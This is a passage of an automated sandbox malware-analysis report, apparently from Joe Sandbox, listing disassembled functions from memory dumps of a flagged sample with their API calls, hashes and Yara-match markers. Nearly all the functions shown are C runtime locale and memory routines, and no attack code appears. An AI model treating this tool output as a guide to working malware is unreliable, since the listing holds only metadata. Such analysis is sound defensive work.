Function 00420291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001,?,?,=CA,?,0042090F,=CA,?,?,?,?,?,0041433D,?,?), ref: 004202DD

Strings

=CA, xrefs: 00420296

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: =CA
API String ID: 1084509184-159236625
Opcode ID: ab85bc1e43991df2705f07cc57a9aa43a57183c5a15191c37f6533489f07c1c3
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: ab85bc1e43991df2705f07cc57a9aa43a57183c5a15191c37f6533489f07c1c3
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 626a58fd2a11263c701827f8cc7ecaecf78fb438a8408d1622c62f471aa76bb7
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 626a58fd2a11263c701827f8cc7ecaecf78fb438a8408d1622c62f471aa76bb7
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05CB07D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FDF
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05CB0829

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 626a58fd2a11263c701827f8cc7ecaecf78fb438a8408d1622c62f471aa76bb7
Instruction ID: 28220d828e80d9c58975e9b1e5f672187fcdcee0e848cfd1e901de5e1189061a
Opcode Fuzzy Hash: 626a58fd2a11263c701827f8cc7ecaecf78fb438a8408d1622c62f471aa76bb7
Instruction Fuzzy Hash: A021B672A102069BEB24AA24DC49FFB77ACEB44314F1005BAE905E6140EBB6DA44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05CB045D Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001,00000000,?,05CA45A4,?,05CB0BB2,00000000,?,?,?), ref: 05CB04CF

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 6ecc5bd197992c8aded88e3bc6e768e3d3d56082aa0088f612a67ffe9f881cb2
Instruction ID: bad96b14b7939dc15d9c48c34785000da2a1fba809bccd670ccab21325189e9a
Opcode Fuzzy Hash: 6ecc5bd197992c8aded88e3bc6e768e3d3d56082aa0088f612a67ffe9f881cb2
Instruction Fuzzy Hash: 551129376007019FEB189F39D898ABBB792FF84358F58482DE98657A40D7B16942CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: f66693705f548f29d4e13755c6b95d8f8d6fc91d438b3d8f3cc98e9f9ea0c49c
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: f66693705f548f29d4e13755c6b95d8f8d6fc91d438b3d8f3cc98e9f9ea0c49c
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 05CB0A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05CB07A3,00000000,00000000,?), ref: 05CB0A31

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: f66693705f548f29d4e13755c6b95d8f8d6fc91d438b3d8f3cc98e9f9ea0c49c
Instruction ID: ba5eebe6f22baad7fa80ce990a147d3166317394d9dd3d131e328d1de4fac0f1
Opcode Fuzzy Hash: f66693705f548f29d4e13755c6b95d8f8d6fc91d438b3d8f3cc98e9f9ea0c49c
Instruction Fuzzy Hash: D7F0F972A11115AFEB249A648C0DBFB7769FB40654F040C69ED0AB3140EAB4BF41C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 05CB07D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FDF
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05CB0829

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: 1152c9a690252a7377cfbe899625357eb1f628e1904b2506c158f17a5db859b4
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: 26F0F432B00209ABDB14AB24DC49EFB33ACDB44310F0405B9E906E7240DA75AE0597D4

Uniqueness

Uniqueness Score: -1.00%

Function 05CB04F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001,?,?,05CA45A4,?,05CB0B76,05CA45A4,?,?,?,?,?,05CA45A4,?,?), ref: 05CB0544

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ab85bc1e43991df2705f07cc57a9aa43a57183c5a15191c37f6533489f07c1c3
Instruction ID: 8feb0a61ac8a078cb473901a39cad4e6ddf035504f686527bdc5458e240fb223
Opcode Fuzzy Hash: ab85bc1e43991df2705f07cc57a9aa43a57183c5a15191c37f6533489f07c1c3
Instruction Fuzzy Hash: E7F0F4363003055FEB249E799C88BBB7B91FB80358F04486DE90697A40D6B19A419A44

Uniqueness

Uniqueness Score: -1.00%

Function 05CA774B Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05CA4002,?,00000004), ref: 05CA779E

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: bdf4708afd556614b321b7ba30ca8abefbbf0edfd97a2c7b622dd544a3718d33
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: ACF09632741218BBDF12AF61EC05F7E7FB6EF04711F900579FC0966250CA714E24A699

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 34f2c7c79e2cbef245b5bba48df75d0ee1bc9e4dcdbb44796bb0ada881aefcd0
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 34f2c7c79e2cbef245b5bba48df75d0ee1bc9e4dcdbb44796bb0ada881aefcd0
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 05CA7358 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA1C62: RtlEnterCriticalSection.NTDLL(?), ref: 05CA1C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05CA7390

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 34f2c7c79e2cbef245b5bba48df75d0ee1bc9e4dcdbb44796bb0ada881aefcd0
Instruction ID: 0f9dd1091b3fe2f6b7d12b4aa86975edd7638dd36728552be1828ed6fdcbb0b2
Opcode Fuzzy Hash: 34f2c7c79e2cbef245b5bba48df75d0ee1bc9e4dcdbb44796bb0ada881aefcd0
Instruction Fuzzy Hash: C1F04F36A503059FEB14EF78DC49B5D7BF0EB04714F10552AF514DB2A0CB7449449B49

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001,?,?,?,0042096D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 004201E2

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 05CB0412 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001,?,?,?,05CB0BD4,05CA45A4,?,?,?,?,?,05CA45A4,?,?,?), ref: 05CB0449

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 06790ed20314bd43c1ced446099814d3d71765b734f0159c474e85f6666c2555
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 7BF0553A30020557DB08AF3ADC09BBBBF91FFC1714F4A409AEE098B240C671D942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 05C99E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,05C995DF), ref: 05C99E72

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 04095C93 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp, Offset: 04095000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4095000_i1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: d0c4fa46363b5c62a77c3ee5f537d352395207c167a667b0a8a24c7e299b3070
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 22118EB3350100AFDB55DF56DC81EA673EAEB89324B298065ED08DB312E675EC01D760

Uniqueness

Uniqueness Score: -1.00%

Function 05C90D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 84be90fecf850302b7ed5097cea012a037e5cca1d7d04d625214f2260318ea94
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 7E0184776006049FDF25CF24C80CFBA33F5FBC5215F4548A9D506A7241E774A9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 05CA21D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05CA2241
_free.LIBCMT ref: 05CA2257
_free.LIBCMT ref: 05CA2268
_free.LIBCMT ref: 05CA2279
_free.LIBCMT ref: 05CA2290
GetCPInfo.KERNEL32(?,?), ref: 05CA22D8

Part of subcall function 05CAB3B5: _free.LIBCMT ref: 05CAB420

_free.LIBCMT ref: 05CA2484
_free.LIBCMT ref: 05CA2497
_free.LIBCMT ref: 05CA24A5
_free.LIBCMT ref: 05CA24B0
_free.LIBCMT ref: 05CA24F2
_free.LIBCMT ref: 05CA24FA
_free.LIBCMT ref: 05CA2502
_free.LIBCMT ref: 05CA250A
_free.LIBCMT ref: 05CA2518

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: bb9a4e4425b13d85d5fc8274263932a1a621f3c9aa228fe50bd1018b34eaf444
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: 3CB1C072E002169FDB21DFB9C884BEEBFF5FF08308F144929E995A7241DB3599419B60

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 05CAF788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 05CAF7CC

Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEB38
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEB4A
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEB5C
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEB6E
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEB80
Part of subcall function 05CAEB1B: _free.LIBCMT ref: 05CAEB92
